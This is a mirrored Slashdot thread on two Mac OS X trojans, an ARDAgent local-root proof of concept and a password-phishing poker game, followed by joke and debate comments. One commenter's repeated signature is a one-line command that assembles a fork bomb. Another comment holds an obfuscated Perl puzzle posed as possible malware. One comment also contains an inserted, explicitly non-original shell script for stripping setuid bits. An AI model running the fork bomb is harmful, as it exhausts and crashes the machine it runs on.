Slashdot Mirror


Two Trojans For Mac OS X

I Don't Believe in Imaginary Property writes "F-Secure is reporting that there are two new Mac OS X trojans. The first is just a proof-of-concept from the MacShadows people that takes advantage of the unpatched ARDAgent vulnerability to get root access when run by the user. The second relies on social engineering: it's a poker game that requests the user's password, claiming to have detected a 'corrupt preference file.' It then takes control of the computer. Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password."

326 comments

  1. users by Anonymous Coward · · Score: 5, Funny

    Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password.

    Are you sure? After all, we are talking about *mac* users. :P

    Let the flamewars begin!

    1. Re:users by Anonymous Coward · · Score: 0

      Will they rudely demand it?

    2. Re:users by wkcole · · Score: 1

      Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password. Are you sure? After all, we are talking about *mac* users. :P

      Let the flamewars begin!

      The groundbreaking PoC for politely asking for authentication info was the Swen spamming worm. I've been seeing the result of Outlook Express users happily handing it their passwords for over 4 years, although the rate these days is just a trickle. People in general are a large enough set to follow Sturgeon's Law. Many will give their passwords to anyone who asks in conjunction with promising something positive.

  2. Two Trojans For Mac OS X Users by stuntmanmike · · Score: 5, Funny

    One for you, one for your partner.

    1. Re:Two Trojans For Mac OS X Users by Anonymous Coward · · Score: 2, Funny

      And ribbed for the mac users pleasure!

      Seriously, OS X is a unix system, so anything that works on it will also work on Linux. More slashdot readers should be concerned.

    2. Re:Two Trojans For Mac OS X Users by mrsteveman1 · · Score: 2, Informative

      That's a stretch, the APIs are completely different, as are most of the system services, the way the kernel works. In fact, most of it is different.

    3. Re:Two Trojans For Mac OS X Users by Anonymous Coward · · Score: 0

      GNU/Linux is not Unix/Linux.

    4. Re:Two Trojans For Mac OS X Users by aproposofwhat · · Score: 0, Troll

      I'd have thought that Spartans would be more likely to home in on Mac users, given their reported proclivities...

      --
      One swallow does not a fellatrix make
    5. Re:Two Trojans For Mac OS X Users by somersault · · Score: 5, Insightful

      This exploit is done via AppleScript and the Apple Remote Desktop Agent, which should hopefully give you some kind of hint as to why this particular issue is not going to be a problem on Linux.

      OSX is certified yes, and presumably some of the basic shell commands will be exactly the same at a source level as in Linux, but in the Linux world patches are uploaded to repositories pretty quickly and users can then download updates immediately. Apple users (of which I am one) have to wait for Apple to release updates, unless they compile everything themselves. I don't know if there's an equivalent of apt-get for OSX, I haven't looked..

      Then there's the fact that 99.99% (number pulled out of my ass obviously) of exploitable bugs will have already been patched in the common OS level commands by now simply because they are being used in so many different distros. Sure there is the odd high profile bug, I remember one a few weeks ago on /. about a bug in some file listing function, though I don't think it was actually a security risk as opposed to just an annoying bug.

      --
      which is totally what she said
    6. Re:Two Trojans For Mac OS X Users by rocketPack · · Score: 1

      OS X is a unix system, so anything that works on it will also work on Linux.

      Do you work for SCO?
    7. Re:Two Trojans For Mac OS X Users by Sancho · · Score: 1

      However this kind of problem is well understood in the Unix world. Be very careful of your setuid binaries. I'm extremely disappointed that Apple developers let a setuid binary run arbitrary scripts. Can you imagine if Microsoft Word with its scripting abilities were run as root? (oh, wait.....)

    8. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 3, Interesting

      This exploit is done via AppleScript and the Apple Remote Desktop Agent, which should hopefully give you some kind of hint as to why this particular issue is not going to be a problem on Linux.

      Dude, I could easily write a malicious Perl script that would run just fine on Linux, if I could just talk you into running it. You'd be able to see the source code, but unless you're a Perl expert, it wouldn't be at all obvious what it was doing. I wouldn't bother trying to get root access, because I don't need root access.

      I wrote this a few years ago. Can you see how it works?


      #!/usr/bin/perl

      use strict;
      use warnings;

      ($,,$",$_,@_)=reverse qw(164 163 165 112),",\n",split '','\ ';

      my $music='Art';
      my($swing,$rock)=q
      s/hacker/performer/; # another creator of art...
      my $blues=~/^.(\w+).*#\s(\w+)/;
      my $jazz=substr((grep m($music)=>qx($^X$,-v))[$[],$?,scalar @_);
      my $pop=eval qq("\\@_");

      print $pop, $rock, $jazz, $swing;
      print;

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    9. Re:Two Trojans For Mac OS X Users by mrsteveman1 · · Score: 1

      You list 6 basic *nix commands and therefore claim the platforms are identical? Are you retarded?

      Contrary to your claim, most security issues occur in parts of the system that handle data for other programs, like system libraries, services, the kernel itself. Things that are usually quite different between platforms like I pointed out before.

      An exploit targeting a windows library to handle jpeg data is worthless against a Linux machine. And as in this specific case, an Applescript is completely worthless against Linux. I'm not sure there's a way to run Applescripts on Linux even with significant effort; certainly it goes way beyond "click this poker game!", you'd have to manually install all sorts of stuff if it's even available at all.

    10. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      Hmm okay I only started using perl this year so am not familiar with all the special operators but here I go :P

      Heh I was going through that piece by piece, had got to the grep bit when I happened to read something about @_ . I've no idea what would happen when the split function tries to operate on the @_ variable since split itself works with that variable? The rest of the program being disguised as just another perl hacker (just being the numbers, another and hacker being matched in rock/blues and the perl executable name presumably coming from $^X).

      I'm pretty lost overall on the grep line too, I'm not sure how a reference would work from what I think is just a quote of 'art'. But presumably you're setting things up to run the perl executable in the eval statement. If I hadn't started looking at this so late then I'd keep looking into it but seeing as it's 12:30am and I have work tomorrow I'm off to bed. I'll leave you to leave me stewing or give me some hints, I've been looking at obscure perl operator documentation for the last hour :P

      --
      which is totally what she said
    11. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 1

      You're definitely on the right track. There is no $blues, of course, and the order of operations is significant on the reverse line - in particular, EVERYTHING on that line following the "reverse" all gets reversed, which includes the result of split '','\ ' which of course gives you two values. This all has to happen before anything can go into @_. $, is just a conveniently confusing place to put a space, but $" is a special variable that perl will use later.

      Apparently the word "scalar" is redundant here; I'll remove it from future incarnations.

      In any case, you've done quite well for only having your head stuck in documentation for an hour. But be honest, did you confirm what it was going to do by studying the code before you tried it to find out, or did you run it first so you had some idea of what to look for? If the latter, I could have infected you with something nasty.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    12. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      heh no I didn't run it I was just going through it in my head while checking back and forth with online documentation, mostly perlvar. It ended up being more like an hour and 20 minutes of looking at the actual code and then I was thinking about running parts of it today (not all of it obviously if it is going to do something malicious, just want to find out what effect changing $" has on quotes in practice etc) as I was heading to sleep :P

      I'm not familiar with that use of q at all, I usually just use qq and curly braces for my quoting needs. I thought it perhaps was using the newline as the delimiter (which it could be if \n was assigned to $", though I'm not sure if reverse would also reverse a quoted string in that context, again something I'd have to try out) so blues would be a valid variable. If the quote does carry on to that line, wouldn't an error be thrown up when perl can't find $blues?

      I might have a go trying a few things at lunchtime or after work, but for now I must get back to my not-quite-so-advanced perl hacking :) Actually I just realised I must have been using perl since Feb 2007 when I started writing a web app for work to track the movements of their equipment. I for some reason thought I'd only been using perl since feb this year - the time has flown by! 8|

      --
      which is totally what she said
    13. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 1

      q is to qq as ' is to " if that helps.

      q'foo'
      qq"foo"
      qe`foo`
      qr/foo/

      These are the default quoting characters; if you omit the q, qq, qe or qr, then you can simply use 'foo', "foo", `foo` and /foo/, but if you do use q, qq, qe or qr then you can use any delimiter characters you want. A newline does NOT count; it uses the next character after the newline as the delimiter.

      Reverse in this context doesn't reverse a quoted string, it reverses a list which has seven items in it. You don't get the list until you've done the split; that's why I said order of operations is significant.

      There is no $blues.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    14. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      Ah, don't mind me, q must be the same as single quotes whereas I usually use qq which does interpolation of variables (which is awesome compared to always having to concatenate as with other languages I've used over the years)

      --
      which is totally what she said
    15. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      I get most of the program but I don't understand why m()=> executes a file? The only thing I can find on m is that it's the match operator. I did run it with the perl -v string but haven't searched through the resulting string to see what substr will get out of that mess yet, and lunch is over.

      I'm also wondering if you ever actually sleep.

      --
      which is totally what she said
    16. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      Okay, so even though http://perldoc.perl.org/functions/qx.html claims that qx is just a generalised quotes operator, apparently it is actually used for system calls so that sorts out that. I'm not sure what the m($music)=> bit will do though, possibly match art within the version info? I'm using ActivePerl so the version info will be different from perl on Linux, can check up on OSX later though to see what is in there and if it's relevant.

      --
      which is totally what she said
    17. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 1

      Yikes! Where I said qe there (more than once), I meant qx.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    18. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 1

      Look at perldoc perlop again; what is => a synonym for?

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    19. Re:Two Trojans For Mac OS X Users by Phroggy · · Score: 1

      I've never tested this on ActivePerl; let me know if it behaves differently. Note the capitalization of "Art".

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    20. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      Ah - hadn't noticed quite how comprehensive that page actually was.. thanks.

      Kinda makes me wish I had a virtual machine setup just so I didn't have to be quite so cautious.

      --
      which is totally what she said
    21. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      The version info matching works fine. I did kinda suspect last night that maybe you're leading me on a wild goose chase, and now I have decided that's just what it was :P Perhaps your point is that it took me that long to find out, either that or you just wanted to laugh at me >_> . I thought perhaps it was going to take some combination of letters out of the version string and form them into a malicious command..

      --
      which is totally what she said
    22. Re:Two Trojans For Mac OS X Users by extrasupermario · · Score: 1

      "I don't know if there's an equivalent of apt-get for OSX, I haven't looked..." Here is your equivalent: http://www.macports.org/

    23. Re:Two Trojans For Mac OS X Users by somersault · · Score: 1

      Thanks :)

      --
      which is totally what she said
  3. Worst. Trojan. Ever. by Anonymous Coward · · Score: 5, Funny

    The second relies on social engineering: it's a poker game that requests the user's password, claiming to have detected a 'corrupt preference file.' It then takes control of the computer.
    Worst. Trojan. Ever.

    Hey guys, I've got a great new idea for a worm, I'm gonna start an e-mail chain letter that tells people they'll have 7 years bad luck if they don't forward the e-mail to 10 friends and send me their root passwords, IP address and their bank account and credit card numbers. It's sure to be a smashing success!
    1. Re:Worst. Trojan. Ever. by hdparm · · Score: 1

      Are you trying to prove the concept, or something?

    2. Re:Worst. Trojan. Ever. by Yahweh+Doesn't+Exist · · Score: 1

      Agreed.

      I received a 'proof of concept trojan' in Mac Mail a few days ago. It was an email telling me my university account was being updated and I should reply with my username and password to confirm it was still active.

      Fortunately I received a 'patch' shortly after in the form of another confirming my suspicions that the first one was a hoax.

      Honest question; aside from advertising for some security company and 'Macs aren't teh 100%%%%% sekure!1' flamebait, what purpose does this article serve?

    3. Re:Worst. Trojan. Ever. by rwiggers · · Score: 3, Insightful

      Unfortunately I think it will be a huge success. People do the dumbest thing all the time. Otherwise I wouldn't see every now and then a no-news in the journal about some lottery-ticket scam and the police saying it's quite common. Just in case a lottery-ticket scam isn't common in your area: Someone approaches the victim saying that they have won the lottery, but for some bogus and nonsense reason can't draw the prize, so they need to exchange the ticket with the victim for a fraction of the prize...

    4. Re:Worst. Trojan. Ever. by Steauengeglase · · Score: 3, Funny

      Just like a Mac fan. Complain that 3rd party Trojans aren't good enough for them.

    5. Re:Worst. Trojan. Ever. by Lisandro · · Score: 1

      Worst. Trojan. Ever.

      Oh come on. That has to be the coolest trojan ever. I almost want to give it my password!

    6. Re:Worst. Trojan. Ever. by MoldySpore · · Score: 0

      Agreed.

      I received a 'proof of concept trojan' in Mac Mail a few days ago.

      So proof of concept is when mac users send their information to Prince Kwame Greg Mensah, the son of the king of Ashanti Village, to get his Millions of "dollers"?

      --
      "I hope you know how very lucky you are to know me, because I am so incredibly incredible."

    7. Re:Worst. Trojan. Ever. by sakasune · · Score: 1

      Someone approaches the victim saying that they have won the lottery, but for some bogus and nonsense reason can't draw the prize, so they need to exchange the ticket with the victim for a fraction of the prize...

      Watching "Matchstick Men" last night, were you?

      Actually, I believe you that it's common, I just never heard of it until I saw the movie years ago.
      --
      "You're arguing for a universe with fewer waffles in it," I said. "I'm prepared to call that cowardice."
    8. Re:Worst. Trojan. Ever. by EmperorKagato · · Score: 1

      You would be surprised at how many users will give you that information.

      Hell, they would give up anything just to see or get the nookie.

      --
      ----- You know you have ego issues when you register a domain in your name.
    9. Re:Worst. Trojan. Ever. by analog_line · · Score: 1

      This one doesn't ask for a password. That's why it's dangerous. It just runs, because the original one doesn't ask for a password. It "just works". Get it through your thick skull.

    10. Re:Worst. Trojan. Ever. by thePowerOfGrayskull · · Score: 1

      This one doesn't ask for a password. That's why it's dangerous. It just runs, because the original one doesn't ask for a password. It "just works". Get it through your thick skull.

      Ah, yes. Something completely different. Running an untrusted program on your computer could have consequences. Quick, stop the presses.
    11. Re:Worst. Trojan. Ever. by Niten · · Score: 1

      But we've already had a first-party trojan from Apple. It was called Safari.

    12. Re:Worst. Trojan. Ever. by Anonymous Coward · · Score: 0

      they should make a worm that continually plays mac vs pc ads until the user agrees to cut their own head off.

    13. Re:Worst. Trojan. Ever. by czbok · · Score: 0

      Someone will give you whatever you want, I'm pretty sure

  4. Proof of Concept Slashdot Trojan by frictionless+man · · Score: 5, Insightful

    Hi Slashdot User!

    We have detected your Slashdot account preferences have been corrupted.

    To fix this, please post your user id and password in response to this message, and one of our customer service operatives will fix your account and recover posting privileges as soon as possible.

    Yours Sincerely, Trojan

    1. Re:Proof of Concept Slashdot Trojan by i'm+lost · · Score: 3, Funny

      I need my preferences fixed. My password is 12345.

    2. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      User: cowboyneal
      Password: 7of9ismydesktop

    3. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 4, Funny

      That sounds like a combination an idiot would have on his luggage.

    4. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 5, Funny

      User Id: Anonymous Coward
      Password is blank.

      I hope you fix my preferences soon, my karma never seems to go up, no matter how much I get modded up.

    5. Re:Proof of Concept Slashdot Trojan by bky1701 · · Score: 1

      It's because you keep posting links to goatse, Anonymous!

    6. Re:Proof of Concept Slashdot Trojan by weicco · · Score: 4, Funny

      1 2 3 4 5? That's amazing! I've got the same combination on my luggage!

      --
      You don't know what you don't know.
    7. Re:Proof of Concept Slashdot Trojan by JohnBailey · · Score: 4, Funny

      Wow.. thanks for the heads up.. my password is "********"

      --
      It is difficult to get a man to understand something when his job depends on not understanding it.
    8. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Har har! Now I OWN your account.. so much for the infamous Anonymous Coward...

    9. Re:Proof of Concept Slashdot Trojan by Hal_Porter · · Score: 5, Funny

      O/T but have you noticed how if you post sensitive information like your password here SlashCode filters it to X's. Very nice idea.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    10. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 1, Informative

      Nah, it's his infernal UID.

    11. Re:Proof of Concept Slashdot Trojan by mrbluze · · Score: 5, Funny

      1 2 3 4 5? That's amazing! I've got the same combination on my luggage!

      Is your luggage by any chance in the form of a wooden horse?
      --
      Do it yourself, because no one else will do it yourself. [beta blockade 10-17 Feb]
    12. Re:Proof of Concept Slashdot Trojan by kestasjk · · Score: 1, Insightful

      And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability?

      Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary.

      (I'm about to be told how this local root vulnerability isn't a real vulnerability, because it's local.)

      --
      // MD_Update(&m,buf,j);
    13. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Sucker! Now I 0wnz y00r acc0unt!

      Anonymous Coward will have a bad rep from now on!

    14. Re:Proof of Concept Slashdot Trojan by fatphil · · Score: 5, Funny

      Obligatory: http://www.bash.org/?244321

      --
      Also FatPhil on SoylentNews, id 863
    15. Re:Proof of Concept Slashdot Trojan by lurch_mojoff · · Score: 5, Insightful

      And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability? Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary. (I'm about to be told how this local root vulnerability isn't a real vulnerability, because it's local.)

      That comment is in the thread of the previous "How to Save Mac OS X From Malware" article, as well as in the comment thread of the article originally reporting the ARD vulnerability posted last week. Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though.

      Also, if you already know what people will respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?
    16. Re:Proof of Concept Slashdot Trojan by knutkracker · · Score: 1

      1 2 3 4 5? That's amazing! I've got the same combination on my luggage!

      Shit.

      Now you're going to change it and I won't be able to ebay your spare socks anymore.

      Loss of income and loss of entertainment. That's one bad-ass trojan.
    17. Re:Proof of Concept Slashdot Trojan by Daimanta · · Score: 1

      Well, my password is the prime factorization of my user id concatenated from small to large to one string.

      --
      Knowledge is power. Knowledge shared is power lost.
    18. Re:Proof of Concept Slashdot Trojan by ohcrapitssteve · · Score: 2, Insightful

      You're about to be told that no OS is safe from its worst users. Okay, a root vulnerability. That's bad. Why is it still asking for a password? Since it is asking (and apparently getting it from some), it doesn't even need to exploit the vulnerability. This is the real news.

      Local root is "business as usual" on out of the box Windows, and has been for a long time. (I'm about to be told a nag screen with a silly make-the-background-dark effect is a reasonable substitute for a real security hierarchy. )

      Just because Mac users are used to a safe operating experience doesn't mean we think we're invulnerable and we don't know how to protect ourselves. I'm sorry all three Mac users you know are morons...

    19. Re:Proof of Concept Slashdot Trojan by laurens · · Score: 1

      Hey, nice primes!

    20. Re:Proof of Concept Slashdot Trojan by WaroDaBeast · · Score: 1

      You might be surprised; I was once messing with luggage combinations -- I was still a kid, by the way -- at some supermarket. Turned out one of them was '005.'

      --
      "The body may heal, but the mind is not always so resilient." -- Deus Ex: Human Revolution
    21. Re:Proof of Concept Slashdot Trojan by MadKeithV · · Score: 1

      My password is all 7's. But I'm not telling you in which order!

    22. Re:Proof of Concept Slashdot Trojan by lordkuri · · Score: 0, Redundant

      12345!? That's amazing! I've got the same combination on my luggage!!

      (someone was going to do it, might as well be me)

    23. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 0, Flamebait

      And where's the comment playing down the seriousness of the first proof-of-concept? The one that uses an unpatched ARDAgent vulnerability?


      All I know is (1) it doesn't run on my Mac (or a lot of other people's Macs), I tried it, and (2) the workaround is terribly easy

      Some Mac users just can't face that they're not as invincible as Apple marketing wants them to think, and reject any evidence to the contrary.


      Maybe. But some Mac haters just can't face that they're far more vulnerable than we are and reject any evidence to the contrary.
      --
      Caveat Utilitor
    24. Re:Proof of Concept Slashdot Trojan by Hal_Porter · · Score: 2, Interesting

      Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?

      Let me tell you a story. Fresh out of university I got my first full time job. I worked in an office. "Worked" was actually a bit of a misnomer; we were all so bored the guy next to me confessed to being so concerned about not having anything to do he typed ps -aux on his Sun occasionally to 'make shit scroll past when the boss walked past'. Someone else said 'you pop a lot of brain cells working here'.

      Everyone wore suits to work, no one did any work as far as I could tell, and no one trusted anyone else. One guy came in with a new, slimline and expensive briefcase. All my coworkers crowded around him saying how cool it was. The boss walked in and headed for the middle of the crowd. He looked at the briefcase and said it was pretty cool. Then he looked at the hinges. They were actually a bit shoddy. He said something like 'I'd be happy if I got something like that in a Christmas cracker, but in something this expensive it's a bit of a disappointment'. The guy with the briefcase looked a bit crestfallen and I think he stopped bringing it to work after a couple of weeks. Especially since the only thing he had to put in it was a sandwich for lunch, which didn't fit as the boss pointed out.

      Now do you understand?

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    25. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though.

      You mean you haven't run into the hordes of Mac fanboys here who claim their Mac is invincible to malware, then used the fact that no malware existed as "proof" of their claims? Of course, you may not have heard much from them recently, as reality finally delivered a well deserved smackdown to these idiots.

    26. Re:Proof of Concept Slashdot Trojan by 2sheds · · Score: 1

      Prepare Spaceball 1 for immediate departure!

      --
      Absit Invidia
    27. Re:Proof of Concept Slashdot Trojan by Thiez · · Score: 1

      There isn't much you can do about that. We know most people trying to 'crack' a luggage combination will start at 000 and keep adding 1 until they find the combination. This makes 005 a bad number, and 999 the best number. However, if everyone would, for this reason, choose their combinations only in the range [100,999], it would make sense for a smart attacker to begin cracking at 100, making combinations on every bag easier to crack (since the keyspace that needs to be searched has shrunk by a factor 0.9).

      So you shouldn't be surprised.

    28. Re:Proof of Concept Slashdot Trojan by stewbacca · · Score: 1

      My password is all 7's. But I'm not telling you in which order!

      Will you tell me how many though?
    29. Re:Proof of Concept Slashdot Trojan by WaroDaBeast · · Score: 1

      Now that I think about it, I remember having seen some pieces of luggage with two combinations; this may reduce the odds of buying easily 'crackable' luggage.

      --
      "The body may heal, but the mind is not always so resilient." -- Deus Ex: Human Revolution
    30. Re:Proof of Concept Slashdot Trojan by samkass · · Score: 2, Insightful

      Now that the source of the proof-of-concept is publicly available, we can expect that future trojans won't just politely request your password.

      What, is this insinuating that they're going to rudely ask for your password? Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day.

      But it still comes down to the user. While there aren't any viruses in the wild for MacOS X, there are always going to be trojans for every OS. It's a lot easier to fool the user than to fool the software. Once you've convinced the user somehow to type their password, it doesn't matter how much security you've got.

      --
      E pluribus unum
    31. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Someone changed the combination to my luggage!

    32. Re:Proof of Concept Slashdot Trojan by 0100010001010011 · · Score: 4, Funny

      <Cthon98> hey, if you type in your pw, it will show as stars
      <Cthon98> ********* see!
      <AzureDiamond> hunter2
      <AzureDiamond> doesnt look like stars to me
      <Cthon98> <AzureDiamond> *******
      <Cthon98> thats what I see
      <AzureDiamond> oh, really?
      <Cthon98> Absolutely
      <AzureDiamond> you can go hunter2 my hunter2-ing hunter2
      <AzureDiamond> haha, does that look funny to you?
      <Cthon98> lol, yes. See, when YOU type hunter2, it shows to us as *******
      <AzureDiamond> thats neat, I didnt know IRC did that
      <Cthon98> yep, no matter how many times you type hunter2, it will show to us as *******
      <AzureDiamond> awesome!
      <AzureDiamond> wait, how do you know my pw?
      <Cthon98> er, I just copy pasted YOUR ******'s and it appears to YOU as hunter2 cause its your pw
      <AzureDiamond> oh, ok.

      (For those that don't want to copy and paste)

    33. Re:Proof of Concept Slashdot Trojan by neomunk · · Score: 1

      Loss of income and loss of entertainment. That's one bad-ass trojan.

      Perhaps we should give it a name to honor the RIAA, with whom it shares so many lovely traits.
    34. Re:Proof of Concept Slashdot Trojan by Steve+Max · · Score: 1

      33353359? Or 3353359? Should I count the two times that "3" appears, or only once like 353 and 359?

    35. Re:Proof of Concept Slashdot Trojan by jcgf · · Score: 1

      Now do you understand?

      Uhh, no actually, your story did not clear anything up at all. Also, why are you responding for another user? It seemed cool, so I decided to try it myself.

    36. Re:Proof of Concept Slashdot Trojan by Huggs · · Score: 1

      pw = iheartcowboyneal ... can you fix me now?

    37. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 1

      Because the ARDAgent vulnerability is really easy to patch... you can easily do it yourself and I'm sure Apple will have a patch any day.


      I'm not sure a patch is warranted. The reason this "vulnerability" doesn't exist on lots of machines is that the default permissions for /System/Library/CoreServices/RemoteManagement/ARDAgent.app are drwxr-xr-x, which means there is no vulnerability. I suspect MacPorts or some other commonly installed app is actually responsible for changing the permissions on ARDAgent.app, thus creating the vulnerability for some users. The night before it was announced I had done an rsync on MacPorts, after which I noticed some bugginess. So I used the install disc to fix permissions and the bugginess went away. Just a theory, of course, but it seems sound in light of my experience. In any event, I have no plans to ever use ARDAgent, so just to be extra sure I archived it to a zip file, and now it is inaccessible.
      --
      Caveat Utilitor
    38. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      The lesson is that there is always some asshole who can't wait to strut in and burst your shiny bubble.
      And yet, that asshole, by existing outside of your peer group is capable of seeing that the bubble
      is not as shiny and perfect as you all think that it is.

    39. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      Next time, instead of checking perms on the .app package folder, try looking at the executable.

    40. Re:Proof of Concept Slashdot Trojan by FishAdmin · · Score: 1
      I was totally behind you, right up to the point where you got possessed by William Shatner:

      Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?
      --
      Last night I played a blank tape at full volume. The mime next door went nuts.
    41. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      With a password like that, I'd say you're broken beyond repair.

    42. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 1

      Next time, instead of checking perms on the .app package folder, try looking at the executable.


      You fail. Next time investigate more thoroughly, helps avoid that foot-in-mouth thing. :)
      --
      Caveat Utilitor
    43. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 1

      Whoops, it's me with foot in mouth, darn! I was thinking I couldn't change perms on the executable without also changing them on the .app or it would disable the .app, but I was mistaken, and you are correct. Of course, the fix (sudo chmod -R u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app) does still cover that.

      Sorry about that, chief!

      --
      Caveat Utilitor
    44. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      You're new here, right?

    45. Re:Proof of Concept Slashdot Trojan by Anonymous Coward · · Score: 0

      I know. Doesn't it rule to love the smell of your own farts?? GO MAC!!!!

    46. Re:Proof of Concept Slashdot Trojan by clang_jangle · · Score: 1

      No, just female. We tend to own our mistakes. :)

      ***races off to avoid battle-of-the-sexes brawl***

      --
      Caveat Utilitor
    47. Re:Proof of Concept Slashdot Trojan by NtroP · · Score: 1

      Next time, instead of checking perms on the .app package folder, try looking at the executable.

      ls -lR /System/Library/CoreServices/RemoteManagement/ARDAgent.app on my system shows that NONE of the files are SUID. Then again, I have not installed many 3rd-party apps except things like FireFox on my MacBook and I run "fix permissions" after major updates. I'm betting the parent is correct and this is a "vulnerability" that is introduced by a third-party application or framework.
      --
      "terrorism" and "pedophilia" are the root passwords to the Constitution
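      The check NtroP describes above (walking the ARDAgent.app bundle and looking for set-user-ID files) and the fix clang_jangle gives earlier (chmod -R u-s on the bundle) can be done for any directory tree. The functions below are an added example, not code from the thread or from Apple; they take the directory to inspect as an argument, so the ARDAgent path and the temporary tree used in the usage note are only assumed inputs.

```shell
#!/bin/sh
# Added example (not part of the Slashdot thread): find set-user-ID / set-group-ID
# files under a directory tree, and optionally strip those bits.
# Uses only POSIX find/chmod, so it runs on Mac OS X and Linux alike.

# list_setid_files DIR
# Prints every regular file under DIR that carries the setuid (4000) or
# setgid (2000) bit, one path per line. Prints nothing when there are none.
# (Paths containing newlines are not handled; none exist under /System.)
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# count_setid_files DIR
# Prints the number of such files, so a caller can test for "0" cheaply.
count_setid_files() {
    list_setid_files "$1" | wc -l | tr -d ' '
}

# strip_setid_bits DIR
# Removes the setuid and setgid bits from every file list_setid_files finds.
# This is the per-file equivalent of "chmod -R u-s" on the whole bundle,
# but it leaves ordinary files and directory modes alone.
strip_setid_bits() {
    list_setid_files "$1" | while IFS= read -r f; do
        chmod u-s,g-s "$f"
    done
}

# Typical use on the path discussed in the thread (needs sudo for the chmod):
#   list_setid_files /System/Library/CoreServices/RemoteManagement/ARDAgent.app
#   sudo sh -c '. ./setid.sh; strip_setid_bits /System/Library/CoreServices/RemoteManagement/ARDAgent.app'
```

      Running list_setid_files over the bundle answers the question argued about above (whether the agent binary is actually setuid on a given machine) without relying on eyeballing ls -lR output; a non-empty result means the local privilege escalation described in the story applies to that machine until the bits are stripped or Apple patches it.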
    48. Re:Proof of Concept Slashdot Trojan by Koiu+Lpoi · · Score: 1

      People have been caught by that on the infamous 4chan's "random" board. Somebody started a topic with the text saying, more or less
      "Hey guys, watch this! If you type in a valid social security number, it wordfilters to all Xs. Watch.

      XXX-XX-XXXX"

      Most people went along with the joke and just posted Xs. However, some people actually posted their real SSN (and then complained about how they couldn't remove the post).

      As my father always said, "Stupidity is always terminal."

    49. Re:Proof of Concept Slashdot Trojan by TClevenger · · Score: 1

      And change the combination on my luggage!

    50. Re:Proof of Concept Slashdot Trojan by AzureDiamond · · Score: 1

      Really? I didn't know that! Nice to know just in case I accidentally type hunter2 sometime, I'm glad /. has my back!

    51. Re:Proof of Concept Slashdot Trojan by kestasjk · · Score: 1

      Yes, Arty McStrawman does believe that his Mac is invincible. Not many beside him do, though.

      This doesn't really work when I was responding directly to "Arty McStrawman"..

      Also, if you already know what will people respond to you, why do you ask your, fairly inflammatory, I might add, question, even if you intended it to be a rhetorical one?

      Because it is a real vulnerability, despite being local. I've been told by "Arty McStrawman" that local vulnerabilities don't count many times on /. before, and didn't want to have to respond to it yet again.
      --
      // MD_Update(&m,buf,j);
